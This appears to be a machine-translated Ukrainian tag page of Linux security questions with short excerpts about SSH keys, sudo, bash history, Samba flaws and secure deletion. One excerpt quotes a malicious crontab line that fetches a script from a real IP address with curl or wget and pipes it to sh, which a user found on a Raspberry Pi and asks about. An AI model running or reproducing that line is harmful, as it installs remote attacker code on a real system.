Запитання з тегом «security»

Відповідно до статті quick7, є кілька вразливих версій Samba, що дозволяють віддалене виконання коду в системах Linux: Незважаючи на те, що викупний черв'як WannaCry вплинув на системи Windows і його легко було ідентифікувати, з чіткими кроками виправлення, вразливість Samba вплине на системи Linux та Unix і може створити значні технічні …

73 linux  security  linux-kernel  samba 

Я повинен мати доступ до сервера для того, щоб зв’язати сервіси інсценування та реальні сервіси компанії в наш цикл розгортання. Адміністратор на їхній стороні встановив два екземпляри, а потім створив користувача на сервері для SSH в як. До цього я дуже звик. На моїй думці, що зараз станеться, я б …

73 ssh  security  key-authentication  administration 

Моя машина - це сервер, тому я хочу ігнорувати з'єднання, встановлені на моєму сервері (наприклад, коли хтось відвідує мій веб-сайт). Я хочу бачити лише з'єднання / запити, які здійснює мій сервер до інших місць. Як я бачу лише ті вихідні з'єднання? EDIT: Я новачок у подібних речах. Що я намагаюся …

71 command-line  networking  shell-script  security 

Я зауважив деякий час тому, що імена користувачів та паролі, задані curlяк аргументи командного рядка, не відображаються у psвиході (хоча, звичайно, вони можуть відображатися у вашій історії баш). Вони також не з'являються в /proc/PID/cmdline. (Довжина комбінованого аргументу ім’я користувача / пароля може бути отримана.) Демонстрація нижче: [root@localhost ~]# nc -l …

68 security  password  curl  ps  arguments 

У нас є невелика проблема на сервері. Ми хочемо, щоб деякі користувачі мали змогу це зробити, наприклад, sudoі стати root, але з тим обмеженням, що користувач не може змінити пароль root. Тобто, це гарантія того, що ми все ще можемо увійти на цей сервер і стати root, незалежно від того, …

66 ubuntu  security  sudo 

Чи є спосіб запобігти доданню команди до вашої історії? У мене є команда, яку я хочу зберігати поза своїм історіальним файлом, і мені дуже байдуже, щоб вона була там, коли я шукаю історію, збережену в пам'яті, хоча це менше турбує. Чи є спосіб запобігти це чи мені просто потрібно повернутися …

65 bash  security  zsh  command-history 

В даний час я віддалено працюю з низкою організацій, які потребують регулярного доступу до їх серверів для обслуговування та оновлення. Чи безпечно я додати в .ssh/authorized_keysфайл мій загальнодоступний ключ SSA RSA, щоб дозволити мені входити набагато швидше / без необхідності пошуку паролів? Я працюю з припущенням, що неможливо генерувати приватний …

60 ssh  security  key-authentication 

Я намагаюся перемістити деякі папки (наприклад, /varта /home) в окремий розділ, прочитавши цей посібник: 3.2.1 Виберіть інтелектуальну схему розділів Мені вдалося перемістити одну папку успішно, дотримуючись цього керівництва. Однак, схоже, це не працює для декількох папок, і всі мої папки скидаються в розділ без належних папок. Я хотів би встановити …

59 debian  security  partition  fstab 

Я хотів щось додати до мого файлу кореневого кронт-файлу на моєму Raspberry Pi, і знайшов запис, який мені здається підозрілим, в пошуках його частин в Google нічого не виявилося. Запис Crontab: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh Вміст http://103.219.112.66:8000/i.sh: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin …

59 security  cron  malware 

Я запускаю Chromium так: chromium --no-sandbox Я роблю це, тому що я запускаю Debian Squeeze на OpenVZ VM Container, і це єдиний спосіб, коли я можу змусити його працювати. Хоча я продовжую читати, це жахливо . Але я хочу знати, чому саме так. Може хтось, будь ласка, пояснить це мені? …

54 security  chrome  browser  sandbox 

Це більше простою цікавості, ніж будь-що інше. Мій друг запитав мене: "Який діапазон портів може використовувати тільки root під Linux?" Я сказав йому, що 0-1024 були обмежені. Тоді він запитав мене, чому це так, і ... я розгубився. Поняття ні про що. Чи є причина, чому ці порти обмежені, а …

53 networking  security  root  tcp 

Мій файл .muttrc виглядає як цей або побачити нижче проблиск. Я вагаюся з паролем. Як я повинен зберігати свій пароль, щоб ним користуватися mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"

52 security  mutt 

Я створив та завантажив приватний .pemключ із AWS. Однак для використання Putty для підключення до віртуальної машини я повинен мати цю клавішу у .ppkформаті. Процес перетворення детально описаний приблизно в 20 рядках: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty Я використовую Linux Mint (дистрибутив Ubuntu), і я знаю, що можу використовувати puttygen в терміналі. Однак я …

49 ssh  linux-mint  security  putty  amazon-ec2 

У мене є процес, який слухають 2 порти: 45136 / tcp і 37208 / udp (насправді я припускаю, що це той самий процес). Але netstat не повертає жодного pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - Той самий результат із "grep 37208". Я також спробував …

47 networking  security  process 

У мене є дерево каталогів, яке я хотів би подрібнити за допомогою утиліти "клаптик" Linux. На жаль, клаптик не має -Rможливості для рекурсивного подрібнення. Як я можу подрібнювати ціле дерево каталогів рекурсивно?

47 security  rm  data-destruction